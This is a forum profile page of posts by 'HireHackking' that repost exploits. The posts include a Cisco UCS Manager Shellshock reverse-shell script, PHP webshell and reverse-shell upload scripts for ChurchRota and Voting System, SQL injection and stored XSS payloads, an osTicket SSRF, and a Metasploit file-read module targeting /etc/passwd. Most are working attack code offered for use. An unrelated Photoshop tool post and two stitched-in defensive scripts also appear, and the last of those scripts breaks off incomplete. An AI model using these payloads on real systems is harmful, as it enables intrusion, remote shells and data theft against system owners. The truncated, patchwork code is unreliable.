HireHackking

Everything posted by HireHackking

  1. # Exploit Title: Cisco UCS Manager 2.2(1d) - Remote Command Execution
     # Description: An unspecified CGI script in Cisco FX-OS before 1.1.2 on Firepower 9000 devices and Cisco Unified Computing System (UCS) Manager before 2.2(4b), 2.2(5) before 2.2(5a), and 3.0 before 3.0(2e) allows remote attackers to execute arbitrary shell commands via a crafted HTTP request, aka Bug ID CSCur90888.
     # Date: 1/15/2021
     # Exploit Author: liquidsky (J.McPeters)
     # Vulnerable Software: Cisco UCS Manager - 2.2(1d) -> [According to the vendor (cisco), this is known to impact versions prior to 3.0(2e).]
     # Vendor Homepage : https://www.cisco.com/c/en/us/products/servers-unified-computing/ucs-manager/index.html
     # Version: 2.2(1d), 2.2(3c)A
     # Cisco Reference: https://quickview.cloudapps.cisco.com/quickview/bug/CSCur90888
     # Tested On: Cisco UCS Manager - 2.2(1d) (Exploit ran with Debian 5.6.7-1kali1 (Kali 2020.1 x64))
     # Author Site: https://github.com/fuzzlove/Cisco-UCS-Manager-2.2-1d-Remote-Command-Execution
     # Special Notes: This application by default uses outdated TLS 1.0 for communication, so that's why there is a quickfix/temporary patch to 1.0 in openssl utilizing 'sed' (that gets changed back after exploitation).
     #
     # Greetz: wetw0rk, Fr13ndz, O.G.Xx25, MS, SS, JK, the S3 family, and last but NOT least droppunx ^_~
     #

     import sys, ssl, os, time
     import requests
     from requests.packages.urllib3.exceptions import InsecureRequestWarning
     requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

     print "+-------------------------------------------------------------+"
     print
     print "- Cisco Unified Computing System Manager CGI RCE "
     print
     print " Cisco UCS Manager - 2.2(1d)"
     print
     print "- PoC by: LiquidSky - 1/15/21 | CISCO-BUG-ID: CSCur90888 "
     print
     print "+-------------------------------------------------------------+"

     try:
         target = sys.argv[1]
         shellip = sys.argv[2]
         shellport = sys.argv[3]
     except IndexError:
         print
         print "- Usage: %s <vuln-site> <listener-ip> <listener-port>" % sys.argv[0]
         print "- Example: %s https://ciscoucsmgr 192.168.1.123 443" % sys.argv[0]
         print
         sys.exit()

     def ch3x_w00t():
         if os.geteuid()==0:
             print "[*] Running exploit as root."
         else:
             print "[!] You are not root, be sure you can change /etc/ssl/openssl.cnf"
             print "[x] Most likely going to see an error..."
             time.sleep(5)

     # Performs backup of openssl.cnf just in case and performs checks of existing vulnerable pages...
     def cisco_vuln():
         ch3x_w00t()
         print "[x] Backing up /etc/ssl/openssl.cnf to /etc/ssl/openssl.bak (just in case)"
         os.system("cp /etc/ssl/openssl.cnf /etc/ssl/openssl.bak")
         os.system("sed -i 's/MinProtocol = TLSv1.2/MinProtocol = TLSv1.0/' /etc/ssl/openssl.cnf")
         print "[*] Checking vulnerable URL "
         headers1 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)",
                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                     "Accept-Language": "en-US,en;q=0.5",
                     "Accept-Encoding": "gzip, deflate",
                     "Connection": "close",
                     "Upgrade-Insecure-Requests": "1"}
         cisco_url = "" + target + "/ucsm/isSamInstalled.cgi"
         #Checking page
         check = requests.get(cisco_url, headers=headers1, verify=False)
         #Grabbing response
         res = check.text
         if "true" in res:
             return True
         return False

     # Safety check - make sure the user is okay with the TLS1.0 temp fix
     # Shout out to Dean ^^ for keeping me polite...
     def exploit_question():
         print "[x] Warning the service by default uses TLS1.0 so . . ."
         print
         print "[?] This exploit temporarily patches '/etc/ssl/openssl.cnf' to use TLS1.0 using 'sed' and then changes back to TLS1.2"
         print
         print "[!] A backup is placed in /etc/ssl/openssl.bak just to be safe..."
         print
         question = raw_input('[!] Do you wish to continue, "yes" or "no" ?')
         if question == 'yes':
             print
             print "[!] Great attempting exploitation checks: " + target + '!'
             cisco_vuln()
         else:
             print
             print "[x] Stay safe m8 ;) - Read the source, its safe . . "
             print
             sys.exit()

     exploit_question()

     def cisco_response():
         headers1 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)",
                     "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                     "Accept-Language": "en-US,en;q=0.5",
                     "Accept-Encoding": "gzip, deflate",
                     "Connection": "close",
                     "Upgrade-Insecure-Requests": "1"}
         cisco_url = "" + target + "/ucsm/isSamInstalled.cgi"
         request = requests.get(cisco_url, headers=headers1, verify=False)
         if request.status_code == 200:
             print "[x] Page seems to exist -- Possibly vulnerable?"
         else:
             print "[!] Page does not exist - Not vulnerable"
             print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)"
             os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf")
             sys.exit()

     def cisco_exploit():
         cisco_url = "" + target + "/ucsm/isSamInstalled.cgi"
         headers = {"User-Agent": "() { ignored;};/bin/bash -i >& /dev/tcp/" + shellip + "/" + shellport + " 0>&1",
                    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                    "Accept-Language": "en-US,en;q=0.5",
                    "Accept-Encoding": "gzip, deflate",
                    "Connection": "close",
                    "Upgrade-Insecure-Requests": "1"}
         print "[x] Sending Shell to IP: " + shellip + " Port: " + shellport + ""
         print "[?] If this works you will see the exploit hang"
         requests.get(cisco_url, headers=headers, verify=False)
         print "[!] Shell Sent"

     cisco_exploit()

     def main():
         if cisco_vuln():
             print ""
             print "[+] Perhaps success?"
             print ""
             print " ^_~ got shellz? - [ liquidsky | 2021 ]"
             print
             print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)"
             os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf")
         else:
             print "[-] failure!"
             print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)"
             os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf")

     if __name__ == "__main__":
         main()
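A defender-side check for what the post above actually sends: the CGI bug is triggered by a Bash function definition ("() {") carried in an HTTP header. The following is an added example, not part of HireHackking's post or of the original exploit; the request text is constructed here and only the CGI path /ucsm/isSamInstalled.cgi is taken from the post.

```python
import re
from typing import Dict, List

# Bash function-definition prefix "() {" that a vulnerable CGI hands to a shell
# through an environment variable. Whitespace inside is optional, as variants vary.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# CGI path requested by the UCS Manager PoC above (taken from that post).
UCSM_CGI = "/ucsm/isSamInstalled.cgi"


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased header dict)."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def inspect_request(raw: str) -> Dict[str, object]:
    """Flag every header whose value carries a Bash function definition.

    All headers are checked, not only User-Agent: a CGI environment exposes an
    HTTP_* variable for each of them, so the injection point is not fixed.
    """
    method, path, headers = parse_request(raw)
    tainted = sorted(n for n, v in headers.items() if SHELLSHOCK_RE.search(v))
    return {
        "method": method,
        "path": path,
        "ucsm_cgi": path.split("?", 1)[0] == UCSM_CGI,
        "tainted_headers": tainted,
        "alert": bool(tainted),
    }


def scan(raw_requests: List[str]) -> List[Dict[str, object]]:
    """Return the findings for every request that carries the pattern."""
    return [r for r in (inspect_request(x) for x in raw_requests) if r["alert"]]


# Constructed sample traffic (not captured from a real device).
BENIGN = (
    "GET /ucsm/isSamInstalled.cgi HTTP/1.1\r\n"
    "Host: ucsm.example.test\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\n"
    "X-Debug: {\"a\": 1}\r\n"
    "\r\n"
)
PROBE = (
    "GET /ucsm/isSamInstalled.cgi HTTP/1.1\r\n"
    "Host: ucsm.example.test\r\n"
    "User-Agent: () { ignored;}; /bin/echo probe\r\n"
    "\r\n"
)
ELSEWHERE = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.test\r\n"
    "Referer: (){ :; }; /bin/echo probe\r\n"
    "Cookie: session=abc\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for hit in scan([BENIGN, PROBE, ELSEWHERE]):
        print("ALERT %s %s headers=%s ucsm_cgi=%s"
              % (hit["method"], hit["path"], hit["tainted_headers"], hit["ucsm_cgi"]))
```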
  2. # Exploit Title: Life Insurance Management System 1.0 - 'client_id' SQL Injection
     # Date: 15/1/2021
     # Exploit Author: Aitor Herrero
     # Vendor Homepage: https://www.sourcecodester.com
     # Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html
     # Version: 1.0
     # Tested on: Windows / Linux

     Log in to the application and go to clientStatus.php?client_id=

     sqlmap -u "http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1"
  3. # Exploit Title: Life Insurance Management System 1.0 - File Upload RCE (Authenticated)
     # Date: 15/1/2021
     # Exploit Author: Aitor Herrero
     # Vendor Homepage: https://www.sourcecodester.com
     # Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html
     # Version: 1.0
     # Tested on: Windows / Linux

     Log in to the application, go to Clients and either add a new client or modify an existing one.
     Click the examination button and upload a test.php with the content:

     <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

     Click Upload and intercept the request with Burp Suite.
     Change the content type to image/png.
     Go to the path http://localhost:8080/lims/uploads/test.php?cmd=dir
  4. Use PsCoser to easily and quickly personalize Photoshop's splash screen and interface icons, and to hide or customize the splash text. The software author also provides some PSD templates for startup-image material, so anyone can modify them. The author tested it with Photoshop CC 2015, 2017, 2018, 2019 and 2020.

     Main functions:
     Modify Photoshop's startup screen.
     Modify Photoshop's interface icon (the icon in the upper-left corner of the window).
     Hide and customize the startup text.
     Theme functions to manage startup screens, icons and startup texts, for easy management and quick switching.
     Parse and modify Photoshop icon-resource files to export and modify more of Photoshop's internal pictures.

     Modification method:
     After downloading, unzip the archive and double-click PsCoser_beta6.exe to run it. On Windows 10 and later, run it as administrator. On the first run you need to select Photoshop's installation location; once it is selected, a prompt confirms that the installation is usable. After setting your favorite startup image, start Photoshop to see the effect.

     Finally, note that you should back up before making changes; otherwise the original cannot be restored.
  5. # Exploit Title: osTicket 1.14.2 - SSRF
     # Date: 18-01-2021
     # Exploit Author: Talat Mehmood
     # Vendor Homepage: https://osticket.com/
     # Software Link: https://osticket.com/download/
     # Version: <1.14.3
     # Tested on: Linux
     # CVE : CVE-2020-24881

     osTicket before 1.14.3 suffers from Server Side Request Forgery [SSRF]. The HTML page is rendered on the backend server when the "Print" ticket functionality is called.

     Below are the steps to reproduce this vulnerability:
     1. Create a new ticket.
     2. Select the "HTML Format" format.
     3. Add an image tag with your payload in the src attribute, i.e. <img src="https://mymaliciouswebsite.com">
     4. After submitting this comment, print this ticket.
     5. You'll receive a hit on your malicious website from the internal server on which osTicket is deployed.

     For more details, read my blog:
     https://blackbatsec.medium.com/cve-2020-24881-server-side-request-forgery-in-osticket-eea175e147f0
     https://nvd.nist.gov/vuln/detail/CVE-2020-24881
  6. # Exploit Title: ChurchRota 2.6.4 - RCE (Authenticated)
     # Date: 1/19/2021
     # Exploit Author: Rob McCarthy (@slixperi)
     # Vendor Homepage: https://github.com/Little-Ben/ChurchRota
     # Software Link: https://github.com/Little-Ben/ChurchRota
     # Version: 2.6.4
     # Tested on: Ubuntu

     import requests
     from pwn import listen

     ############################################################################################################
     # Description                                                                                              #
     # Church Rota version 2.6.4 is vulnerable to authenticated remote code execution.                          #
     # The user does not need to have file upload permission in order to upload and execute an arbitrary file. #
     # The application is written primarily with PHP so we use PHP in our PoC                                   #
     ############################################################################################################

     # credentials of the low privilege user
     USERNAME='slixperi'
     PASSWORD='slixperi'
     LISTENER_IP = '127.0.0.1'
     LISTENER_PORT = '4444'
     TARGET_IP = '127.0.0.1'
     TARGET_PORT = '8081'

     # set the credentials for login POST
     credentials = {"username":USERNAME,"password":PASSWORD}

     # create a session to preserve session state
     sesh = requests.session()

     # login as our low-privilege user (normally only admins can upload files)
     sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/login.php", data=credentials)

     # define the payload
     payload = f"<?php $sock=fsockopen(\"{LISTENER_IP}\",{LISTENER_PORT});$proc=proc_open(\"/bin/sh -i\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>"

     # file upload
     sesh.headers.update({"Referer": f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=new"})
     files = {'resourcefile': ("shell.php", payload)}
     sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=newsent", files=files)

     l = listen(LISTENER_PORT)

     # execute the file
     sesh.get(f"http://{TARGET_IP}:{TARGET_PORT}/documents/shell.php")
     l.interactive()
  7. # Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
     # Exploit Author: omurugur
     # Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html
     # Version: 11.1.1.7.140715
     # Author Web: https://www.justsecnow.com
     # Author Social: @omurugurrr

     Stored XSS:
     ";!--""<script>alert(document.cookie);</script>=&{(alert(document.cokie))}

     Vulnerable area = Dashboard - Add New Text
  8. # Exploit Title: Apartment Visitors Management System 1.0 - 'email' SQL Injection
     # Date: 20.01.2021
     # Exploit Author: CANKAT ÇAKMAK
     # Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
     # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
     # Version: V1.0
     # Tested on: Windows 10

     ----------------------------------------------------
     POST /avms/forgot-password.php HTTP/1.1
     Host: test.com
     Content-Length: 42
     Cache-Control: max-age=0
     Upgrade-Insecure-Requests: 1
     Origin: test.com
     Content-Type: application/x-www-form-urlencoded
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
     Sec-Fetch-Site: same-origin
     Sec-Fetch-Mode: navigate
     Sec-Fetch-User: ?1
     Sec-Fetch-Dest: document
     Referer: http://test.com/avms/forgot-password.php
     Accept-Encoding: gzip, deflate
     Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

     email=test%40gmail.com&contactno=1&submit=
     ----------------------------------------------------

     PoC:
     Parameter: email (POST)
         Type: time-based blind
         Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
         Payload: email=test@gmail.com' AND (SELECT 2600 FROM (SELECT(SLEEP(5)))jpeB) AND 'WVFv'='WVFv&contactno=1&submit=
  9. # Exploit Title: Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)
     # Date: 19/01/2021
     # Exploit Author: Richard Jones
     # Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
     # Version: 1.0
     # Tested on: Windows 10 2004 + XAMPP 7.4.4

     import requests

     # --- Edit your settings here ----
     IP = "192.168.1.207"          # Website's URL
     USERNAME = "potter"           # Auth username
     PASSWORD = "password"         # Auth Password
     REV_IP = "192.168.1.207"      # Reverse shell IP
     REV_PORT = "8888"             # Reverse port
     # --------------------------------

     INDEX_PAGE = f"http://{IP}/votesystem/admin/index.php"
     LOGIN_URL = f"http://{IP}/votesystem/admin/login.php"
     VOTE_URL = f"http://{IP}/votesystem/admin/voters_add.php"
     CALL_SHELL = f"http://{IP}/votesystem/images/shell.php"

     payload = """
     <?php
     header('Content-type: text/plain');
     $ip = "IIPP";
     $port = "PPOORRTT";
     $payload = "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";
     $evalCode = gzinflate(base64_decode($payload));
     $evalArguments = " ".$port." ".$ip;
     $tmpdir ="C:\\windows\\temp";
     chdir($tmpdir);
     $res .= "Using dir : ".$tmpdir;
     $filename = "D3fa1t_shell.exe";
     $file = fopen($filename, 'wb');
     fwrite($file, $evalCode);
     fclose($file);
     $path = $filename;
     $cmd = $path.$evalArguments;
     $res .= "\n\nExecuting : ".$cmd."\n";
     echo $res;
     $output = system($cmd);
     ?>
     """

     payload = payload.replace("IIPP", REV_IP)
     payload = payload.replace("PPOORRTT", REV_PORT)

     s = requests.Session()

     def getCookies():
         r = s.get(INDEX_PAGE)
         return r.cookies

     def login():
         cookies = getCookies()
         data = {
             "username":USERNAME,
             "password":PASSWORD,
             "login":""
         }
         r = s.post(LOGIN_URL, data=data, cookies=cookies)
         if r.status_code == 200:
             print("Logged in")
             return True
         else:
             return False

     def sendPayload():
         if login():
             global payload
             payload = bytes(payload, encoding="UTF-8")
             files = {'photo':('shell.php',payload, 'image/png', {'Content-Disposition': 'form-data'} ) }
             data = {
                 "firstname":"a",
                 "lastname":"b",
                 "password":"1",
                 "add":""
             }
             r = s.post(VOTE_URL, data=data, files=files)
             if r.status_code == 200:
                 print("Poc sent successfully")
             else:
                 print("Error")

     def callShell():
         r = s.get(CALL_SHELL, verify=False)
         if r.status_code == 200:
             print("Shell called check your listener")

     print("Start a NC listener on the port you chose above and run...")
     sendPayload()
     callShell()
  10. # Exploit Title: Online Documents Sharing Platform 1.0 - 'user' SQL Injection
      # Date: 21.01.2021
      # Exploit Author: CANKAT ÇAKMAK
      # Vendor Homepage: https://www.sourcecodester.com/php/14653/online-documents-sharing-platform-php-full-source-code.html
      # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/notes.zip
      # Version: V1.0
      # Tested on: Windows 10
      # Description: The 'user' parameter is vulnerable to error-based and time-based SQL Injection.

      ----------------------------------------------------
      POST /path/login.php HTTP/1.1
      Host: test.com
      Content-Length: 29
      Cache-Control: max-age=0
      Upgrade-Insecure-Requests: 1
      Origin: http://test.com
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: navigate
      Sec-Fetch-User: ?1
      Sec-Fetch-Dest: document
      Referer: http://test.com/path/login.php
      Accept-Encoding: gzip, deflate
      Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

      user=%27&pass=%27&login=login
      ----------------------------------------------------

      # PoC:
      Parameter: user (POST)
          Type: error-based
          Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
          Payload: user=' AND (SELECT 2047 FROM(SELECT COUNT(*),CONCAT(0x7176706a71,(SELECT (ELT(2047=2047,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NRPK&pass='&login=login

          Type: time-based blind
          Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
          Payload: user=' AND (SELECT 2110 FROM (SELECT(SLEEP(5)))pSYW)-- HnhM&pass='&login=login
  11. # Exploit Title: Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting
      # Date: 1-20-2021
      # Exploit Author: Matthew Aberegg
      # Vendor Homepage: https://www.nagios.com/products/nagios-xi/
      # Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
      # Software Link: https://www.nagios.com/downloads/nagios-xi/
      # Version: Nagios XI 5.7.5
      # Tested on: Ubuntu 18.04

      # Vulnerability Details
      # Description : A persistent cross-site scripting vulnerability exists in the "My Tools" functionality of Nagios XI.
      # Vulnerable Parameter : url

      # POC
      # Exploit Details : The following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.

      POST /nagiosxi/tools/mytools.php HTTP/1.1
      Host: TARGET
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 145
      Origin: http://TARGET
      Connection: close
      Referer: http://TARGET/nagiosxi/tools/mytools.php?edit=1
      Cookie: nagiosxi=5kbmap730ic023ig2q0bpdefas
      Upgrade-Insecure-Requests: 1

      nsp=a2569a2507c7c69600769ca7388614b4264ab9479c560ac62bbc5f9fd76c2524&update=1&id=-1&name=XSS+Test&url=%27+onclick%3D%27alert%281%29&updateButton=

      ############################################################################################################

      # Vulnerability Details
      # Description : A persistent cross-site scripting vulnerability exists in the "Business Process Intelligence" functionality of Nagios XI.
      # Vulnerable Parameter : groupID

      # POC
      # Exploit Details : The following request will create a BPI group with an XSS payload. Click on the Group ID for the malicious BPI group to trigger the payload.

      POST /nagiosxi/includes/components/nagiosbpi/index.php?cmd=add HTTP/1.1
      Host: TARGET
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 186
      Origin: http://TARGET
      Connection: close
      Referer: http://TARGET/nagiosxi/includes/components/nagiosbpi/index.php?cmd=add&tab=add
      Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
      Upgrade-Insecure-Requests: 1

      groupID=%27onclick%3Dalert%281%29%2F%2F&groupType=default&groupTitle=TEST&groupDesc=&groupInfoUrl=&groupPrimary=1&groupWarn=90&groupCrit=80&groupDisplay=2&addSubmitted=true

      ############################################################################################################

      # Vulnerability Details
      # Description : A persistent cross-site scripting vulnerability exists in the "Views" functionality of Nagios XI.
      # Vulnerable Parameter : url

      # POC
      # Exploit Details : The following request will create a view with an XSS payload. Click on the malicious view to trigger the payload.

      POST /nagiosxi/ajaxhelper.php HTTP/1.1
      Host: TARGET
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
      Accept: */*
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Content-Length: 147
      Origin: http://TARGET
      Connection: close
      Referer: http://TARGET/nagiosxi/account/
      Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td

      cmd=addview&url=javascript:alert(1)&title=TESTVIEW&submitButton=&nsp=c97136052a4b8d7d535c7d4a7a32389a5882c65cb34f2c36b849f72af52b2056
  12. ##
      # This module requires Metasploit: https://metasploit.com/download
      # Current source: https://github.com/rapid7/metasploit-framework
      ##

      class MetasploitModule < Msf::Auxiliary
        include Msf::Auxiliary::Report
        include Msf::Exploit::Remote::HTTP::Wordpress
        include Msf::Auxiliary::Scanner

        def initialize(info = {})
          super(update_info(info,
            'Name'           => 'Simple JobBoard Authenticated File Read Vulnerability',
            'Description'    => %q{
              This module exploits an authenticated directory traversal vulnerability in WordPress plugin
              'Simple JobBoard' < 2.9.3, allowing arbitrary file read with the web server privileges.
            },
            'Author'         => [
              'Arcangelo Saracino',        # Vulnerability discovery
              'Hoa Nguyen - Suncsr Team',  # Metasploit module
            ],
            'License'        => MSF_LICENSE,
            'References'     => [
              ['CVE', '2020-35749'],
              ['WPVDB', 'eed3bd69-2faf-4bc9-915c-c36211ef9e2d'],
              ['URL', 'https://arkango.github.io/CVE-2020/CVE-2020-35749%20DIr.%20Traversal%20Simple%20Board%20Job%20Wordpress%20plugin.html']
            ],
            'DisclosureDate' => 'Jan 15 2021'))

          register_options([
            OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
            OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
            OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with']),
            OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 8]),
          ])
        end

        def username
          datastore['USERNAME']
        end

        def password
          datastore['PASSWORD']
        end

        def check
          cookie = wordpress_login(username, password)
          if cookie.nil?
            store_valid_credential(user: username, private: password, proof: cookie)
            return CheckCode::Safe
          end
          CheckCode::Appears
        end

        def run_host(ip)
          cookie = wordpress_login(username, password)
          traversal = '../' * datastore['DEPTH']
          filename = datastore['FILEPATH']
          # strip the leading slash so the traversal prefix is not neutralised
          filename = filename[1, filename.length] if filename =~ /^\//

          res = send_request_cgi({
            'cookie'   => cookie,
            'method'   => 'GET',
            'uri'      => normalize_uri(target_uri.path, 'wp-admin', ''),
            'vars_get' => {
              'post'     => 'application_id',
              'action'   => 'edit',
              'sjb_file' => "#{traversal}#{filename}"
            }
          })

          fail_with Failure::Unreachable, 'Connection failed' unless res
          fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' if res.code != 200
          fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?

          print_good('Downloading file ...')
          print_line("\n#{res.body}\n")

          fname = datastore['FILEPATH']
          path = store_loot(
            'Simple_JobBoard.traversal',
            'text/plain',
            ip,
            res.body,
            fname
          )
          print_good("File saved in: #{path}")
        end
      end
  13. # Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation
      # Date: 08.11.2020
      # Exploit Author: LiquidWorm
      # Vendor Homepage: https://www.selea.com

      Selea CarPlateServer (CPS) v4.0.1.6 Local Privilege Escalation

      Vendor: Selea s.r.l.
      Product web page: https://www.selea.com
      Affected version: 4.0.1.6(210120)
                        4.013(201105)
                        3.100(200225)
                        3.005(191206)
                        3.005(191112)

      Summary: Our CPS (Car Plate Server) software is an advanced solution that can be installed on computers and servers and used as an operations centre. It can create sophisticated traffic control and road safety systems connecting to stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert notifications directly to tablets or smartphones, it can receive and transfer data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution that offers full integration with main video surveillance software. Our CPS software connects to the national operations centre and provides law enforcement authorities with necessary tools to issue alerts. CPS is designed to guarantee cooperation among different law enforcement agencies. It allows to create a multi-user environment that manages different hierarchy levels and the related division of competences.

      Desc: The application suffers from an unquoted search path issue impacting the service 'Selea CarPlateServer' for Windows deployed as part of Selea CPS software application. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

      Tested on: Microsoft Windows 10 Enterprise
                 SeleaCPSHttpServer/1.1

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2021-5621
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5621.php

      08.11.2020

      --

      C:\Users\Smurf>sc qc "Selea CarPlateServer"
      [SC] QueryServiceConfig SUCCESS

      SERVICE_NAME: Selea CarPlateServer
              TYPE               : 110  WIN32_OWN_PROCESS (interactive)
              START_TYPE         : 2   AUTO_START
              ERROR_CONTROL      : 1   NORMAL
              BINARY_PATH_NAME   : C:/Program Files/Selea/CarPlateServer/CarPlateService.exe
              LOAD_ORDER_GROUP   :
              TAG                : 0
              DISPLAY_NAME       : Selea CarPlateServer
              DEPENDENCIES       :
              SERVICE_START_NAME : LocalSystem

      C:\Users\Smurf>
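An audit helper for the unquoted-path condition described in the advisory above: it parses `sc qc` output, reports whether the image path is unquoted and contains spaces, lists the locations Windows would try in order (the directories whose ACLs must keep non-admins out), and produces the quoted value to set. This is an added example, not from the advisory or the vendor; the sample output is constructed after the advisory's listing, and the candidate list follows the documented CreateProcess search behaviour as a heuristic (it stops at the first prefix naming the .exe).

```python
import re
from typing import Dict, List

# Constructed `sc qc` output modelled on the advisory's listing (not a live capture).
SAMPLE_SC_QC = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Selea CarPlateServer
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:/Program Files/Selea/CarPlateServer/CarPlateService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Selea CarPlateServer
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")


def parse_sc_qc(text: str) -> Dict[str, str]:
    """Turn `sc qc` output into a {FIELD: value} dict."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def is_unquoted_with_spaces(binpath: str) -> bool:
    """True when the image path is not wrapped in quotes and contains a space."""
    p = binpath.strip()
    return " " in p and not p.startswith('"')


def hijack_candidates(binpath: str) -> List[str]:
    """Paths CreateProcess tries, in order, for an unquoted command line.

    It cuts the line at each space, appends ".exe" when the prefix has no
    extension, and stops at the first file that exists. Heuristic: the list
    ends at the first prefix that already names the .exe (anything after it
    is treated as arguments).
    """
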